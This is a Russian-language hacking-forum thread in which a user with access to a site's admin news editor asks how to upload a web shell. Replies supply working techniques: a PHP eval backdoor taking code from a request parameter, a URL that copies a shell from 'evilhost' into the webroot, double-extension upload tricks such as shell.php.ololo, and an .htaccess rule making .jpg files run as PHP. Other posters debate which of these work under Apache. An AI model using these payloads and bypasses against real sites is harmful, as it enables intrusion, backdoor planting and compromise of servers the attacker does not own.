![]() |
Вчера попал в админку.
А в ней можно только новости в html редактировать, ток вот я попробывал вставить: Загрузка файлов PHP код:
но файлы я так понял всё равно не загружаются... думаю прав нет. Есть ещё варианты для загрузки шелла через html ? |
Цитата:
|
жжЁте
по вашему файл сам себя будет копировать на жесткий диск? вы же не обрабатываете файл на стороне сервера |
Дык для того, чтобы принять этот файл, на той странице, куда он отправляется (текущей) должен быть и обработчик, не так ли ? Так вы стучите пальцем об стену.
|
Цитата:
Неужели действительно нет вариантов?? |
Цитата:
|
Варианты может и есть просто не через правку новостей
Может в админе есть заливка картинок или других файлов ? |
Цитата:
это можно обойти? |
Цитата:
|
Цитата:
так как все странички сайта на html, но у меня когда-то доступ к нему был и знаю что оболочка вся на php, ничего кроме xss там не нашлось |
Уважаемый ТС, хочу обратить Ваше внимание на одну мелочь - Варианты есть всегда (с)
Что за движок? можно попробовать вставить php код с бекдором: PHP код:
Код HTML:
localhost/?e=phpinfo();Код HTML:
yoursite.com/news/1.html?e=copy("evilhost/shell.txt","/home/yoursite/shell.php");Это как вариант номер раз) Вариант номер 2.1: Можно попробовать залить вместо картинки файл shell.php.jpg , допустим обработчик переименует его в 12312312312.php.jpg - это может прокатить, при определенных конфигах сервера.... Вариант 2.2: Также можно попробовать залить shell.jpg Предварительно залив .htaccess следующего содержания: Код HTML:
AddType application/x-httpd-php .jpgВариант 2.3: Попробуй залить файл shell.php.g1f или shell.php.ololo файл shell.php.ololo имеет неизвестный формат, т.к. апачу не знакомо расширение .ololo он начнет обрабатывать наш шелл как PHP файл. PS а вообще, я уверен, что это далеко не все способы которые можно попробовать заливаясь из админки... |
умники собрались
Тake_IT "@php eval($_REQUEST[e]); php@ " ты где встречал такие теги "@php php@" ? если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать. тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс? "12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...." ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php такие методы могут сработать в конкретных двигах, но в общем случай писать о них как о методах заливки шелла это глупо. |
Цитата:
Цитата:
Цитата:
Цитата:
в конкретных двигах говорите?) а мы знаем с каким двигом столкнулся ТС ? а вдруг это тот самый, "конкретный"?? PS мне кажется от твоего совета было бы больше проку, чем от критики) |
Цитата:
|
Цитата:
PS ага, пароль потерял, давно не заходил сюда) |
Цитата:
Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды. З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг? |
опачки! одепты подтянулись)))
Ох, ну ничего себе кто меня учить собрался)))) Цитата:
А про то, как в нормальных CMS появляются бекдоры, я расскажу немного позже) как раз снял видео на эту тему Цитата:
file.php.ololo имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать file.php.ololo точно также как и file.php. а знаешь почему?? потому, что в случае если апач встречает файл с незнакомым расширением он начинает искать знакомое расширение с конца имени файла, т.е. фактически, если бы мы залилиfile.php.txt.ololo он бы выполнился как .txt. А не сработает это в том случае, если в дире куда льем файл не выполняется пых Зы вам че, квестики перестали делать?)) плохо, мозги как и мышцы надо тренировать))) И кстати, если для тебя вышеописанное фантастика, почитай хоть темы роа за 2009-2011 года, помнится там было много примеров) Цитата:
|
Цитата:
|
Цитата:
|
Какие там требования чтоб file.php.unknown_extension выполнялся как .php напомните пожалуйста.
mod_mime enabled кажется, и что-то ещё видимо. У меня на локалке mod_mime вроде стоит, а код не выполняется. |
Цитата:
Цитата:
просто ты утверждаешь что такие фичи работают на многих серверах и не по ошибке админа. а мы говорим нет - как заметил бигбир такое бывает или в тех случаях когда сайт уже был похекан, или же когда админ обкуренный |
Цитата:
тс просил не разжевать ему теорию, а дать практический совет который помог бы ему залиться в данном случае! С учетом того, что в его ситуации практически не из чего выбирать я посоветовал ему эти способы) дико извиняюсь, если кого то это затронуло за живое ЗЫ всех с Наступающим)) |
| Время: 10:15 |